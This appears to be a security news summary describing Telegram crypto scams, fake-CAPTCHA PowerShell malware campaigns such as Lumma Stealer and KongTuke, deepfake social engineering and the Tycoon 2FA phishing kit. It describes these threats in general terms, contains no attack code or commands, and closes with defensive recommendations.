Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action

Telegram Captcha Attacks and Malicious Scripts

Rising Threats on Telegram

In recent months, there has been a significant surge in crypto scams and malware attacks targeting users on Telegram. Here are some key points:

• Surge in Scams: Between November 2024 and January 2025, crypto scams on Telegram have increased by 2,000%. These scams often involve malicious bots or counterfeit trading platforms that trick users into activating harmful code, granting attackers access to sensitive data such as passwords and crypto wallets1.

• Malware Infiltration: Attackers infiltrate legitimate Telegram groups and use fake invites to lure victims into joining fake communities. Once engaged, users are tricked into executing malicious scripts, which can lead to the installation of malware like the Lumma Stealer or other similar threats13.

Malicious PowerShell Scripts

Fake CAPTCHA Challenges

Several recent campaigns have utilized fake CAPTCHA challenges to deceive users into executing malicious scripts:

• Lumma Stealer: In a campaign observed by CERT-AGID, Lumma Stealer malware used fake CAPTCHA warnings to trick users into executing PowerShell scripts. This led to the infection of systems with the malware, which targets sensitive information such as GitHub repositories and Windows users3.

• KongTuke Campaign: This malicious campaign involves injected scripts that create fake "verify you are human" pages. Users are tricked into copying and executing a malicious PowerShell script, leading to an infection that exploits the BOINC platform for malicious purposes3.

Social Engineering and Messaging Security

Deepfakes and Generative AI

Social engineering tactics have been significantly enhanced by the emergence of generative AI and deepfakes:

• Psychological Manipulation: Deepfakes exploit psychological principles such as authority, trust, fear, urgency, reciprocity, and familiarity. They convincingly mimic real people, including executives or trusted individuals, to manipulate users into divulging sensitive information or performing unauthorized actions2.

• Automation and Personalization: Generative AI automates and personalizes phishing messages, while deepfakes enable highly believable impersonations. This combination scales the exploitation of human psychology, making social engineering attacks more effective and widespread2.

Advanced Phishing Kits

The evolution of phishing kits, such as the Tycoon 2FA phishing kit, poses a significant threat to messaging security:

• Bypassing 2FA: The latest version of Tycoon 2FA targets Microsoft 365 session cookies to bypass multi-factor authentication (MFA) protections. It uses compromised email accounts, obstructive source code, and measures to detect and block automated security scripts, making it challenging for security solutions to identify and analyze phishing pages5.

• Evasion Techniques: The kit employs various evasion techniques, including disabling right-click menus, overwriting clipboard content, and redirecting users to legitimate sites to mask its true purpose. These tactics enhance the kit's ability to evade detection by automated tools and security analysts5.

Recommendations and Mitigations

• User Vigilance: Users should avoid running unverified commands or installing suspicious software. Legitimate crypto platforms will never request such actions, and users should be vigilant in navigating online interactions1.

• Education and Awareness: Training programs should focus on teaching employees to recognize manipulation tactics, question unexpected requests, and verify the authenticity of communications. Building a culture of skepticism and critical thinking can help counteract psychological vulnerabilities exploited by deepfakes and other social engineering tools2.

• Detection Technology: Utilizing deepfake detection solutions that leverage AI-powered models can help identify and alert users to deepfakes in real time. These solutions can integrate into existing workflows without affecting operational efficiency2.

By staying informed about these evolving threats and implementing robust security measures, individuals and organizations can better protect themselves against the rising tide of social engineering and malware attacks.